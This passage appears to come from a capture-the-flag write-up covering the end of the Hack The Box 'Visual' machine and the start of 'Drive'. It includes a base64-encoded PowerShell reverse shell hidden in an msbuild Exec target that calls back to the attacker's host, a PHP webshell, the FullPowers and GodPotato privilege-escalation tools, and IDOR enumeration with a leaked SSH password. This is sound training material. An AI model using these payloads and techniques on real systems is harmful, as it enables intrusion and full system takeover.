<Exec Command="powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4ANgAiACwANAA0ADMAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA" />
</Target>
</Project>
I’ll add and commit that to git, and the push to Gitea and resubmit to Visual. Eventually, I get a shell at nc
:
oxdf@hacky$ rlwrap -cAr nc -lnvp 443
Listening on 0.0.0.0 443
Connection received on 10.10.11.234 49698
PS C:\Windows\Temp\acd49d47976809051b1f24cba31553> whoami
visual\enox
I can get the user flag:
PS C:\users\enox\desktop> type user.txt
11d634b6************************
The host is relatively empty. The only other interesting thing in the enox user’s home directory is compile.ps1
, which seems like it handles the compilation for the website. It reads a list of submissions to compile from a text file:
$todofile="C:\\xampp\htdocs\uploads\todo.txt"
It then loops through that file, processing and compiling with msbuild.exe
and updating the todo.txt
file.
This isn’t useful for a next step on it’s own, but it does show that enox can read and write within at least part of the xampp
directories.
The C:\xampp\htdocs
directory is the root of the webserver:
PS C:\xampp\htdocs> ls
Directory: C:\xampp\htdocs
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 6/10/2023 10:32 AM assets
d----- 6/10/2023 10:32 AM css
d----- 6/10/2023 10:32 AM js
d----- 2/21/2024 11:17 AM uploads
-a---- 6/10/2023 6:20 PM 7534 index.php
-a---- 6/10/2023 4:17 PM 1554 submit.php
-a---- 6/10/2023 4:11 PM 4970 vs_status.php
I’ll try writing a PHP file there:
PS C:\xampp\htdocs> Set-Content -path 0xdf.php -Value '<?php phpinfo(); ?>'
It works:
It’s worth noting that PowerShell is weird about encoding if I use echo
. For example:
PS C:\xampp\htdocs> echo '<?php phpinfo(); ?>' > fail.php
This will not work because it writes 16-bit characters (as can be seen in the site of the files):
PS C:\xampp\htdocs> ls
Directory: C:\xampp\htdocs
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 6/10/2023 10:32 AM assets
d----- 6/10/2023 10:32 AM css
d----- 6/10/2023 10:32 AM js
d----- 2/21/2024 11:17 AM uploads
-a---- 2/21/2024 11:24 AM 21 0xdf.php
-a---- 2/21/2024 11:26 AM 44 fail.php
-a---- 6/10/2023 6:20 PM 7534 index.php
-a---- 6/10/2023 4:17 PM 1554 submit.php
-a---- 6/10/2023 4:11 PM 4970 vs_status.php
fail.php
is twice the size of 0xdf.php
, despite the content looking the same. I can also see this by fetching fail.php
from the webserver:
oxdf@hacky$ curl -s 10.10.11.234/fail.php -o- | xxd
00000000: fffe 3c00 3f00 7000 6800 7000 2000 7000 ..<.?.p.h.p. .p.
00000010: 6800 7000 6900 6e00 6600 6f00 2800 2900 h.p.i.n.f.o.(.).
00000020: 3b00 2000 3f00 3e00 0d00 0a00 ;. .?.>.....
The encoding is causing XAMPP to not run it as PHP.
I’ll update 0xdf.php
to a PHP webshell:
PS C:\xampp\htdocs> Set-Content -path 0xdf.php -Value '<?php system($_REQUEST["cmd"]); ?>'
The site is running as nt authority\local service:
I’ll replace whoami
with the reverse shell from above, and on hitting enter, there’s a shell at nc
:
oxdf@hacky$ rlwrap -cAr nc -lnvp 443
Listening on 0.0.0.0 443
Connection received on 10.10.11.234 49699
PS C:\xampp\htdocs> whoami
nt authority\local service
I would expect local service to have some privileges, but it seems that they have been stripped away:
PS C:\xampp\htdocs> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== ========
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
When Windows starts a service as local service or network service, the service starts with a reduced set of privileges that might be available to that user. A researcher found that if a scheduled tasks is started as one of those users, the full set of privileges comes with it, including SeImpersonate
.
A tool, FullPowers automates that process. There’s a compiled .exe
on the release page.
I’ll download the executable to my host, and serve it with a Python web server. I’ll fetch it with wget
on Visual:
PS C:\programdata> wget 10.10.14.6/FullPowers.exe -outfile FullPowers.exe
If I just run this, it seems to work, but then doesn’t:
PS C:\programdata> .\FullPowers.exe
[+] Started dummy thread with id 2076
[+] Successfully created scheduled task.
[+] Got new token! Privilege count: 7
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.17763.4851]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
PS C:\programdata>
That’s because of how my reverse shell is running. It’s doing a loop to run commands, return the result, and then wait. In this case, it runs FullPowers.exe
, which results in a new prompt, but then that exits and it drops back to my original prompt without the new powers.
If I give it whoami /priv
, it confirms that it is working:
PS C:\programdata> .\FullPowers.exe -c "whoami /priv"
[+] Started dummy thread with id 2328
[+] Successfully created scheduled task.
[+] Got new token! Privilege count: 7
[+] CreateProcessAsUser() OK
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= =======
SeAssignPrimaryTokenPrivilege Replace a process level token Enabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeAuditPrivilege Generate security audits Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
There’s a bunch more privileges there, including SeImpersonate
.
I’ll give it the same reverse shell again:
PS C:\programdata> .\FullPowers.exe -c "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4ANgAiACwANAA0ADMAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA"
It hangs, but at nc
:
oxdf@hacky$ rlwrap -cAr nc -lnvp 443
Listening on 0.0.0.0 443
Connection received on 10.10.11.234 49708
PS C:\Windows\system32>
And this shell has SeImpersonate
:
PS C:\Windows\system32> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= =======
SeAssignPrimaryTokenPrivilege Replace a process level token Enabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeAuditPrivilege Generate security audits Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
I’ve shown many Potato exploits over the years. Microsoft keeps trying to block ways to use SeImpersonate
to get a system shell, and researchers keep finding new ways. The current popular exploit is GodPotato.
I’ll download the (latest release](https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET4.exe) to my host, and serve it with a Python web server. From Visual, I’ll fetch it:
PS C:\programdata> wget 10.10.14.6/GodPotato-NET4.exe -outfile gp.exe
Running it without args gives the usage, and running the example shows it gets system:
PS C:\programdata> .\gp.exe -cmd "cmd /c whoami"
[*] CombaseModule: 0x140715322900480
[*] DispatchTable: 0x140715325206640
[*] UseProtseqFunction: 0x140715324582816
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] CreateNamedPipe \\.\pipe\072a5030-acb7-4e49-bd61-f21fe7ca2b09\pipe\epmapper
[*] Trigger RPCSS
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 00006c02-12b0-ffff-cbf0-93d7ee1fce8a
[*] DCOM obj OXID: 0xdd2bb902652bc07
[*] DCOM obj OID: 0x89cf102b060e442b
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 872 Token:0x816 User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 1672
nt authority\system
I’ll get a reverse shell and run it:
PS C:\programdata> .\gp.exe -cmd "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4ANgAiACwANAA0ADUAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA"
It just hangs, but at nc
:
oxdf@hacky$ rlwrap -cAr nc -lnvp 445
Listening on 0.0.0.0 445
Connection received on 10.10.11.234 49716
PS C:\programdata> whoami
nt authority\system
And I can grab the flag:
PS C:\users\administrator\desktop> type root.txt
e3563d96************************
Drive has a website that provides cloud storage. I’ll abuse an IDOR vulnerability to get access to the administrator’s files and leak some creds providing SSH access. From there I’ll access a Gitea instance and use the creds to get access to a backup script and the password for site backups. In these backups, I’ll find hashes for another use and crack them to get their password. For root, there’s a command line client binary that has a buffer overflow. I’ll show that, as well as two ways to get RCE via an unintended SQL injection.
Name | Drive Play on HackTheBox |
---|---|
Release Date | 14 Oct 2023 |
Retire Date | 17 Feb 2024 |
OS | Linux |
Base Points | Hard [40] |
Rated Difficulty | |
Radar Graph | |
00:38:51 | |
01:35:01 | |
Creator |
nmap
finds two open TCP ports, SSH (22) and HTTP (80), as well as port 3000 filtered:
oxdf@hacky$ nmap -p- --min-rate 10000 10.10.11.235
Starting Nmap 7.80 ( https://nmap.org ) at 2024-02-13 14:56 EST
Nmap scan report for 10.10.11.235
Host is up (0.093s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3000/tcp filtered ppp
Nmap done: 1 IP address (1 host up) scanned in 7.19 seconds
oxdf@hacky$ nmap -p 22,80 -sCV 10.10.11.235
Starting Nmap 7.80 ( https://nmap.org ) at 2024-02-13 14:56 EST
Nmap scan report for 10.10.11.235
Host is up (0.092s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://drive.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.97 seconds
Based on the OpenSSH version, the host is likely running Ubuntu 20.04 focal. There’s a redirect on 80 to http://drive.htb
. Given the user of domain names, I’ll brute force for any subdomains that respond differently on the webserver, but not find any. I’ll add drive.htb
to my /etc/hosts
file.
The site is for a cloud storage service:
Only three links on the page go off the page,”Contact Us”, “Register” and “Login”. The rest of the links jump around on this page. There are some names and positions, as well as a couple @drive.htb
email addresses. There’s also a “Subscribe” box at the bottom. Entering an email and hitting submit sends a POST request to /subscribe/
, which returns a 302 Found. It’s not clear if these are processed or not.
The /contact/
page has a form:
Submitting sends a POST to /contact/
, and the response shows a message:
I’ll send some XSS payloads, but nothing every connects back.
Registration goes to /register/
:
Login at /login/
looks similar:
Once I log in, there’s a /home/
page that shows files:
The only file there has a message from the admins:
In the “Files” menu, I can upload a file, and it tells about the kinds of files that are accepted above the form:
I can upload a file, and then there are more options than “Just View”:
I can also mark a file as reversed in the “Files” menu. When I pick a file, it sends a POST to /blockfile/
:
POST /blockFile/ HTTP/1.1
Host: drive.htb
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://drive.htb/blockFile/
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 113
Origin: http://drive.htb
Connection: close
Cookie: csrftoken=GWHHBpfjentV8FG7IVYiKgMAmK5wNVaF; sessionid=c8xebin9cekvgy59r1de8wvfmllxgrnu
files%5B%5D=test&csrfmiddlewaretoken=TV5WYjQQiBYyYAZkMkW1sGSkywsHtNFUpHCtpyVZmOhjW5vhk5K92MuKK6n36yFp&action=post
Then I’m redirected to the dashboard, where it shows up with my handle in the “Reserve” column:
In the “My Files” section, there’s a way to do this with a GET request:
This sends a GET to /112/block/
, where 112 is the ID for the file (viewing the file is at /112/getFileDetail/
).
There are also Groups. I can create a group and add users to it, comma separated. I’ll try adding users that don’t exist:
When viewing the group, I’ll see that “admin” is added, but the two non-sense ones are not:
This is a way to enumerate users.
The “Reports” section shows my activity:
The HTTP response headers show only nginx:
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 13 Feb 2024 20:05:17 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Frame-Options: DENY
Vary: Cookie
X-Content-Type-Options: nosniff
Referrer-Policy: same-origin
Cross-Origin-Opener-Policy: same-origin
Set-Cookie: csrftoken=FMAJgqV5IHLMXN9PKh36bMxTZZryFxBZ; expires=Tue, 11 Feb 2025 20:05:17 GMT; Max-Age=31449600; Path=/; SameSite=Lax
Content-Length: 14647
csrftoken
is the default name for this protection in Django (the Python web framework), so that could be a sign. The 404 page also matches this reference for the Django 404:
I’ll start feroxbuster
on the site, but after a minute is starts returning 500s
There’s nothing super interesting in here that I don’t find by browsing the site.
The URL for a group is /[id]/getGroupDetail/
. Similarly, the URL for a file is /[id]/getFileDetail/
. I’ll test to see how other ids respond. For example, groups:
oxdf@hacky$ ffuf -u http://drive.htb/FUZZ/getGroupDetail/ -w <(seq 1 500) -fc 500 -H "Cookie: csrftoken=GWHHBpfjentV8FG7IVYiKgMAmK5wNVaF; sessionid=c8xebin9cekvgy59r1de8wvfmllxgrnu"
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.0.0-dev
________________________________________________
:: Method : GET
:: URL : http://drive.htb/FUZZ/getGroupDetail/
:: Wordlist : FUZZ: /dev/fd/63
:: Header : Cookie: csrftoken=GWHHBpfjentV8FG7IVYiKgMAmK5wNVaF; sessionid=c8xebin9cekvgy59r1de8wvfmllxgrnu
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
:: Filter : Response status: 500
________________________________________________
28 [Status: 401, Size: 26, Words: 2, Lines: 1, Duration: 364ms]
39 [Status: 401, Size: 26, Words: 2, Lines: 1, Duration: 374ms]
40 [Status: 401, Size: 26, Words: 2, Lines: 1, Duration: 401ms]
42 [Status: 401, Size: 26, Words: 2, Lines: 1, Duration: 302ms]
47 [Status: 200, Size: 5407, Words: 1244, Lines: 193, Duration: 300ms]
49 [Status: 200, Size: 5407, Words: 1244, Lines: 193, Duration: 293ms]
48 [Status: 200, Size: 5406, Words: 1244, Lines: 193, Duration: 299ms]
:: Progress: [500/500] :: Job [1/1] :: 142 req/sec :: Duration: [0:00:03] :: Errors: 0 ::
Here, I have ffuf
hit http://drive.htb/FUZZ/getGroupDetail/
to check for all group numbers. For the wordlist, I’ll use -w <(seq 1 500)
, which uses process substitution to pretend there’s a file containing the numbers 1 through 500 one per line. -fc 500
will hide results that return HTTP 500, which is what happens when there’s a non-existent id. I’ll also need to include my cookie, which I can grab from Burp.
I’ll note that the last three are groups I created (47-49) and return 200. The others, 28, 39, 40, and 42, return 401. Trying to visit these return 401 Unauthorized:
HTTP/1.1 401 Unauthorized
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 13 Feb 2024 21:11:32 GMT
Content-Type: application/json
Content-Length: 26
Connection: close
X-Frame-Options: DENY
Vary: Cookie
X-Content-Type-Options: nosniff
Referrer-Policy: same-origin
Cross-Origin-Opener-Policy: same-origin
{"status": "unauthorized"}
I can do the same attack on files:
oxdf@hacky$ ffuf -u http://drive.htb/FUZZ/getFileDetail/ -w <(seq 1 500) -fc 500 -H "Cookie: csrftoken=GWHHBpfjentV8FG7IVYiKgMAmK5wNVaF; sessionid=c8xebin9cekvgy59r1de8wvfmllxgrnu"
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.0.0-dev
________________________________________________
:: Method : GET
:: URL : http://drive.htb/FUZZ/getFileDetail/
:: Wordlist : FUZZ: /dev/fd/63
:: Header : Cookie: csrftoken=GWHHBpfjentV8FG7IVYiKgMAmK5wNVaF; sessionid=c8xebin9cekvgy59r1de8wvfmllxgrnu
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
:: Filter : Response status: 500
________________________________________________
79 [Status: 401, Size: 26, Words: 2, Lines: 1, Duration: 336ms]
99 [Status: 401, Size: 26, Words: 2, Lines: 1, Duration: 335ms]
98 [Status: 401, Size: 26, Words: 2, Lines: 1, Duration: 347ms]
101 [Status: 401, Size: 26, Words: 2, Lines: 1, Duration: 327ms]
100 [Status: 200, Size: 5078, Words: 1147, Lines: 172, Duration: 357ms]
112 [Status: 200, Size: 5053, Words: 1062, Lines: 167, Duration: 334ms]
:: Progress: [500/500] :: Job [1/1] :: 149 req/sec :: Duration: [0:00:03] :: Errors: 0 ::
There are two files I can access. 112 is the test file I uploaded, and 100 is the “Welcome_to_Doodle_Grive!” file owned by admin. There are four other files that I can’t access - 79, 98, 99, and 101.
It’s worth noting that while I would expect an API endpoint like /[id]/block/
to set the reserved attribute to my user id, that actually returns a page:
The /[id]/block/
page will show files that I otherwise can’t access:
This is an insecure direct object reference (IDOR) vulnerability.
The four files each contain some clues about the rest of the box. 101 (above) has references to a scheduled backup for the DB in /var/www/backups
(that may change) that has a strong password.
ID 98 has references to an edit functionality:
99 has says that the dev team needs to stop using the platform for chat, and references security issues:
Most importantly, 79 has a username and password:
That username and password work for SSH access to Drive:
oxdf@hacky$ sshpass -p 'Xk4@KjyrYv8t194L!' ssh martin@drive.htb
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-164-generic x86_64)
...[snip]...
martin@drive:~$
martin’s home directory is basically empty:
martin@drive:~$ ls -la
total 32
drwxr-x--- 5 martin martin 4096 Sep 11 09:24 .
drwxr-xr-x 6 root root 4096 Dec 25 2022 ..
lrwxrwxrwx 1 root root 9 Sep 6 02:56 .bash_history -> /dev/null
-rw-r--r-- 1 martin martin 220 Dec 25 2022 .bash_logout
-rw-r--r-- 1 martin martin 3771 Dec 25 2022 .bashrc
drwx------ 2 martin martin 4096 Dec 25 2022 .cache
drwx------ 3 martin martin 4096 Jan 7 2023 .gnupg
-rw-r--r-- 1 martin martin 807 Dec 25 2022 .profile
drwx------ 3 martin martin 4096 Jan 7 2023 snap
There are three other directories in /home
:
martin@drive:/home$ ls
cris git martin tom
martin is not able to access any of them.
There are two scripts in /opt
:
martin@drive:/opt$ ls -l
total 8
-r-x------ 1 www-data www-data 187 Feb 11 2023 nginx-log-size-handler.sh
-r-x------ 1 www-data www-data 3834 Feb 8 2023 server-health-check.sh
Interestingly, they are only accessible to the www-data user.
In /var/www
, there are three directories:
martin@drive:/opt$ ls -l /var/www/
total 12
drwxr-xr-x 2 www-data www-data 4096 Sep 1 18:23 backups
drwxrwx--- 8 www-data www-data 4096 Feb 14 14:34 DoodleGrive
drwxr-xr-x 2 root root 4096 Jan 7 2023 html
Only www-data can access DoodleGrive
, and html
is just the default nginx page:
martin@drive:/var/www$ cd DoodleGrive/
-bash: cd: DoodleGrive/: Permission denied
martin@drive:/var/www$ ls html/
index.nginx-debian.html
backups
is what was mentioned in the file:
martin@drive:/var/www/backups$ ls
1_Dec_db_backup.sqlite3.7z 1_Oct_db_backup.sqlite3.7z db.sqlite3
1_Nov_db_backup.sqlite3.7z 1_Sep_db_backup.sqlite3.7z
I am able to list the contents of each backup:
martin@drive:/var/www/backups$ 7z l 1_Dec_db_backup.sqlite3.7z
...[snip]...
Date Time Attr Size Compressed Name
------------------- ----- ------------ ------------ ------------------------
2022-12-26 06:21:51 ....A 3760128 12848 DoodleGrive/db.sqlite3
------------------- ----- ------------ ------------ ------------------------
2022-12-26 06:21:51 3760128 12848 1 files
martin@drive:/var/www/backups$ 7z l 1_Nov_db_backup.sqlite3.7z
...[snip]...
Date Time Attr Size Compressed Name
------------------- ----- ------------ ------------ ------------------------
2023-09-01 18:25:59 ....A 3760128 12080 db.sqlite3
------------------- ----- ------------ ------------ ------------------------
2023-09-01 18:25:59 3760128 12080 1 files
martin@drive:/var/www/backups$ 7z l 1_Oct_db_backup.sqlite3.7z
...[snip]...
Date Time Attr Size Compressed Name
------------------- ----- ------------ ------------ ------------------------
2022-12-26 06:02:42 ....A 3760128 12576 db.sqlite3
------------------- ----- ------------ ------------ ------------------------
2022-12-26 06:02:42 3760128 12576 1 files
martin@drive:/var/www/backups$ 7z l 1_Sep_db_backup.sqlite3.7z
...[snip]...
Date Time Attr Size Compressed Name
------------------- ----- ------------ ------------ ------------------------
2022-12-26 06:03:57 ....A 3760128 12624 db.sqlite3
------------------- ----- ------------ ------------ ------------------------
2022-12-26 06:03:57 3760128 12624 1 files
Each archive contains a db.sqlite3
file. The timestamps for the archives and the databases inside them are very confusing. I’m going to chalk that up to poor work on the author / HTB’s part and try not to read too much into it.
Trying to unpack any of the archives prompts for a password:
martin@drive:/var/www/backups$ 7z x 1_Dec_db_backup.sqlite3.7z
7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,2 CPUs AMD EPYC 7302P 16-Core Processor (830F10),ASM,AES-NI)
Scanning the drive for archives:
1 file, 13018 bytes (13 KiB)
Extracting archive: 1_Dec_db_backup.sqlite3.7z
--
Path = 1_Dec_db_backup.sqlite3.7z
Type = 7z
Physical Size = 13018
Headers Size = 170
Method = LZMA2:22 7zAES
Solid = -
Blocks = 1
Enter password (will not be echoed):
No password I have so far works. I could try to exfil them and crack the password, but first I’ll look at db.sqlite3
, which I can access:
martin@drive:/var/www/backups$ sqlite3 db.sqlite3
SQLite version 3.31.1 2020-01-27 19:55:54
Enter ".help" for usage hints.
sqlite>
There’s nothing too interesting in here. The accounts_customusers
table has hashes, and I can quickly crack tomHands password of “john316”, but I don’t yet has a use for it.
nmap
identified that port 3000 was handling requests differently, showing it as filtered. It shows up in the netstat
as well:
martin@drive:~$ netstat -tnlp
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:33060 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
